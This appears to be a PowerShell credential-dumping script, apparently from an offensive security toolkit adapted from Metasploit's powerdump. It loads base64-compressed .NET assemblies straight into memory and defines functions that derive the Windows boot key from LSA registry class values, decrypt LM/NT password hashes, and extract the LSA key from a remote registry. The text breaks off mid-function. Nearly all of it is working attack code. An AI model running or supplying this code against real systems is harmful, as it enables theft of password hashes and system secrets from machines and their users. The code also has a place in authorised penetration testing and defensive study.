https://github.com/ShokoAnime/ShokoServer/blob/master/Shoko.Server/FileHelper/MD4Managed.cs $EncodedCompressedFile = @' 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 '@ $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) $UncompressedFileBytes = New-Object Byte[](6656) $DeflatedStream.Read($UncompressedFileBytes, 0, 6656) | Out-Null $Null = [Reflection.Assembly]::Load($UncompressedFileBytes) # compiled bitshift assembly from https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1 $EncodedCompressedFile = @' 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 '@ $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) $UncompressedFileBytes = New-Object Byte[](3584) $DeflatedStream.Read($UncompressedFileBytes, 0, 3584) | Out-Null $Null = [Reflection.Assembly]::Load($UncompressedFileBytes) function Decrypt-Hash { <# .SYNOPSIS Helper that to decryptes an LM/NT user hash using the HBootKey. Adapted from https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1 Credit to Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K) ! #> [CmdletBinding()] Param( $RID, [Byte[]] $HBootKey, [Byte[]] $EncHash, [ValidateSet('NT', 'LM')] [String] $HashType = 'NT' ) $EmptyLMHash = [Byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee) $EmptyNTHash = [Byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0) function DESDecrypt { Param( [Byte[]] $Data, [Byte[]] $Key ) $DES = New-Object Security.Cryptography.DESCryptoServiceProvider $DES.Mode = [Security.Cryptography.CipherMode]::ECB $DES.Padding = [Security.Cryptography.PaddingMode]::None $DES.Key = $Key $DES.IV = $Key $DES.CreateDecryptor().TransformFinalBlock($Data, 0, $Data.Length) } function ConvertRID-ToKey ($RID) { $s1 = @() $s1 += [Char]($RID -band 0xFF) $s1 += [Char]([Shift]::Right($RID, 8) -band 0xFF) $s1 += [Char]([Shift]::Right($RID, 16) -band 0xFF) $s1 += [Char]([Shift]::Right($RID, 24) -band 0xFF) $s1 += $s1[0] $s1 += $s1[1] $s1 += $s1[2] $s2 = @() $s2 += $s1[3] $s2 += $s1[0] $s2 += $s1[1] $s2 += $s1[2] $s2 += $s2[0] $s2 += $s2[1] $s2 += $s2[2] ,((ConvertSTR-ToKey $s1), (ConvertSTR-ToKey $s2)) } function ConvertSTR-ToKey ($S) { $OddParity = @( 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 ) # convert des 56 to 64 $Key = @() $Key += [Shift]::Right([Int]($S[0]), 1 ) $Key += [Shift]::Left( $([Int]($S[0]) -band 0x01), 6) -bor [Shift]::Right([Int]($S[1]), 2) $Key += [Shift]::Left( $([Int]($S[1]) -band 0x03), 5) -bor [Shift]::Right([Int]($S[2]), 3) $Key += [Shift]::Left( $([Int]($S[2]) -band 0x07), 4) -bor [Shift]::Right([Int]($S[3]), 4) $Key += [Shift]::Left( $([Int]($S[3]) -band 0x0F), 3) -bor [Shift]::Right([Int]($S[4]), 5) $Key += [Shift]::Left( $([Int]($S[4]) -band 0x1F), 2) -bor [Shift]::Right([Int]($S[5]), 6) $Key += [Shift]::Left( $([Int]($S[5]) -band 0x3F), 1) -bor [Shift]::Right([Int]($S[6]), 7) $Key += $([Int]($S[6]) -band 0x7F) 0..7 | % { $Key[$_] = [Shift]::Left($Key[$_], 1); $Key[$_] = $OddParity[$Key[$_]]; } $Key } if ($EncHash) { # basically a PowerShell implementation of SystemFunction005 $DESKeys = ConvertRID-ToKey -RID $RID $MD5 = [Security.Cryptography.MD5]::Create() if ($HashType -eq 'NT') { $RC4Key = $MD5.ComputeHash($hBootKey[0..0x0f] + [BitConverter]::GetBytes($RID) + [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0")) } else { $RC4Key = $MD5.ComputeHash($hBootKey[0..0x0f] + [BitConverter]::GetBytes($RID) + [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0")) } $OBFKey = ConvertTo-Rc4ByteStream -InputObject $EncHash -Key $RC4key (DESDecrypt $OBFKey[0..7] $DESKeys[0]) + (DESDecrypt $OBFKey[8..$($OBFKey.Length - 1)] $DESKeys[1]) } elseif ($HashType -eq 'NT') { $EmptyNTHash } else { $EmptyLMHash } } function Decrypt-Bytes { <# .SYNOPSIS Helper that to decrypt an AES blob. Used to decrypt LSA secret with temp key. #> [CmdletBinding()] Param( [Parameter()] [Byte[]] $Key, [Parameter()] [Byte[]] $CipherText, [Parameter()] [Byte[]] $InitV = @(0) * 16 ) $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider $AES.Mode = "CBC" $AES.Key = $Key $AES.IV = $InitV $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros ($AES.CreateDecryptor()).TransformFinalBlock($CipherText, 0, $CipherText.Length) } function Decrypt-AES { <# .SYNOPSIS Helper that to decrypt an AES blob. Used to decrypt LSA secret with temp key. #> [CmdletBinding()] Param( [Parameter()] [Byte[]] $Key, [Parameter()] [Byte[]] $CipherText, [Parameter()] [Byte[]] $InitV = @(0) * 16, [Parameter()] [String] $PaddingMode = "Zeros" ) $AES = New-Object System.Security.Cryptography.RijndaelManaged $AES.Key = $Key $AES.IV = $InitV $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC $AES.Padding = [System.Security.Cryptography.PaddingMode]::$PaddingMode $AES.BlockSize = 128 $Transform = $AES.CreateDecryptor() $Chunks = [Math]::Ceiling($CipherText.Length / 16) $Plaintext = @() try { for($i=0; $i -lt $Chunks; $i++) { $Offset = $i*16; $Chunk = $CipherText[$Offset..($Offset+15)] try { $Plaintext += $Transform.TransformFinalBlock($Chunk, 0, $Chunk.Count) } catch { Write-Warning "Error transforming block: $_" } } $Plaintext } catch { $_ } try { $Transform.Dispose() $AES.Dispose() } catch {} } function Get-LsaSha256Hash { <# .SYNOPSIS Helper that calculates the proper SHA256 hash of an LSA key. #> [CmdletBinding()] Param( [Parameter()] [Byte[]] $Key, [Parameter()] [Byte[]] $Data ) $Sha256 = New-Object System.Security.Cryptography.SHA256Managed $Sha256.ComputeHash($Key + ($Data * 1000)) try { $Sha256.Dispose() } catch {} } function ConvertTo-Rc4ByteStream { <# .SYNOPSIS Converts an input byte array to a RC4 cipher stream using the specified key. Author: @harmj0y License: BSD 3-Clause Required Dependencies: None .PARAMETER InputObject The input byte array to encrypt with the RC4 cipher. .PARAMETER Key The byte array of the RC4 key to use. .EXAMPLE $Enc = [System.Text.Encoding]::ASCII $Data = $Enc.GetBytes('This is a test! This is only a test.') $Key = $Enc.GetBytes('SECRET') ($Data | ConvertTo-Rc4ByteStream -Key $Key | ForEach-Object { "{0:X2}" -f $_ }) -join ' ' .LINK https://en.wikipedia.org/wiki/RC4 http://www.remkoweijnen.nl/blog/2013/04/05/rc4-encryption-in-powershell/ #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] [Byte[]] $InputObject, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Byte[]] $Key ) begin { # key-scheduling algorithm [Byte[]] $S = 0..255 $J = 0 0..255 | ForEach-Object { $J = ($J + $S[$_] + $Key[$_ % $Key.Length]) % 256 $S[$_], $S[$J] = $S[$J], $S[$_] } $I = $J = 0 } process { # pseudo-random generation algorithm (PRGA) combined with XOR logic ForEach($Byte in $InputObject) { $I = ($I + 1) % 256 $J = ($J + $S[$I]) % 256 $S[$I], $S[$J] = $S[$J], $S[$I] $Byte -bxor $S[($S[$I] + $S[$J]) % 256] } } } function Get-RemoteBootKey { <# .SYNOPSIS Helper that retrieves the bootkey/syskey from a remote registry instance. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: PSReflect .DESCRIPTION Takes a remote registry handle and uses the RegOpenKeyEx/RegQueryInfoKey API calls to query the appropriate class info from the HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD, HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1, HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG, and HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data keys, and uses these values to calculate the SysKey/bootkey. .PARAMETER hKey Specifies the handle to the remote registry instance to retrieve the bootkey from. #> [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [ValidateNotNullOrEmpty()] [IntPtr] $hKey ) # get the 'JD' class $Result = $Advapi32::RegOpenKeyEx($nKey, "SYSTEM\CurrentControlSet\Control\Lsa\JD", 0, 0x19, [ref]$hKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SYSTEM\CurrentControlSet\Control\Lsa\JD key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $ClassVal = New-Object Text.Stringbuilder 1024 [Int]$len = 1024 $Result = $Advapi32::RegQueryInfoKey($hKey,$ClassVal,[ref]$len,0,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[System.IntPtr]::Zero) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error enumerating the SYSTEM\CurrentControlSet\Control\Lsa\JD key: $(([ComponentModel.Win32Exception] $Result).Message)" } $JDCLass = $ClassVal.ToString() # get the 'Skew1' class $Result = $Advapi32::RegOpenKeyEx($nKey,"SYSTEM\CurrentControlSet\Control\Lsa\Skew1",0,0x19,[ref]$hKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SYSTEM\CurrentControlSet\Control\Lsa\Skew1 key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $ClassVal = New-Object Text.Stringbuilder 1024 [Int]$len = 1024 $Result = $Advapi32::RegQueryInfoKey($hKey,$ClassVal,[ref]$len,0,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[System.IntPtr]::Zero) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error enumerating the SYSTEM\CurrentControlSet\Control\Lsa\Skew1 key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $Skew1CLass = $ClassVal.ToString() # get the 'GBG' class $Result = $Advapi32::RegOpenKeyEx($nKey,"SYSTEM\CurrentControlSet\Control\Lsa\GBG",0,0x19,[ref]$hKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SYSTEM\CurrentControlSet\Control\Lsa\GBG key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $ClassVal = New-Object Text.Stringbuilder 1024 [Int]$len = 1024 $Result = $Advapi32::RegQueryInfoKey($hKey,$ClassVal,[ref]$len,0,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[System.IntPtr]::Zero) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error enumerating the SYSTEM\CurrentControlSet\Control\Lsa\GBG key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $GBGCLass = $ClassVal.ToString() # get the 'Data' class $Result = $Advapi32::RegOpenKeyEx($nKey,"SYSTEM\CurrentControlSet\Control\Lsa\Data",0,0x19,[ref]$hKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SYSTEM\CurrentControlSet\Control\Lsa\Data key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $ClassVal = New-Object Text.Stringbuilder 1024 [Int]$len = 1024 $Result = $Advapi32::RegQueryInfoKey($hKey,$ClassVal,[ref]$len,0,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[ref][System.IntPtr]::Zero,[System.IntPtr]::Zero) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error enumerating the SYSTEM\CurrentControlSet\Control\Lsa\Data key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $DataCLass = $ClassVal.ToString() # use the combined class data to calculate the boot key $Combined = $JDClass + $Skew1CLass + $GBGCLass + $DataCLass # pulled from https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1 # credit to Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K) $B = New-Object Byte[] $($Combined.Length/2); 0..$($B.Length-1) | %{$B[$_] = [Convert]::ToByte($Combined.Substring($($_*2),2),16)} $Bootkey = New-Object Byte[] 16; 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$Bootkey[$i]=$B[$_];$i++} $Bootkey } function Get-RemoteLSAKey { <# .SYNOPSIS Helper that retrieves the LSA key from a remote registry instance. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: PSReflect .DESCRIPTION Takes a remote registry handle and uses the RegOpenKeyEx/RegQueryValueEx API calls to extract the encrypted LSA bytes from the HKLM:\SECURITY\Policy\PolEKList key, calculates the appropriate SHA256 hash using the bootkey, and then decrypts the LSA key using the combined value. .PARAMETER hKey Specifies the handle to the remote registry instance to retrieve the LSA key from. .PARAMETER BootKey A byte array containing the decrypted bootkey/syskey. #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [ValidateNotNullOrEmpty()] [IntPtr] $hKey, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Byte[]] $BootKey ) [IntPtr]$pKey = [System.IntPtr]::Zero $Result = $Advapi32::RegOpenKeyEx($nKey,"SECURITY\Policy\PolEKList",0,0x19,[ref]$pKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SECURITY\Policy\PolEKList key: $(([ComponentModel.Win32Exception] $Result).Message)" return } [Int]$Size = 0 $Result = $Advapi32::RegQueryValueEx($pKey,$Null,0,[ref]0,$Null,[ref]$Size) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error enumerating the SECURITY\Policy\PolEKList key: $(([ComponentModel.Win32Exception] 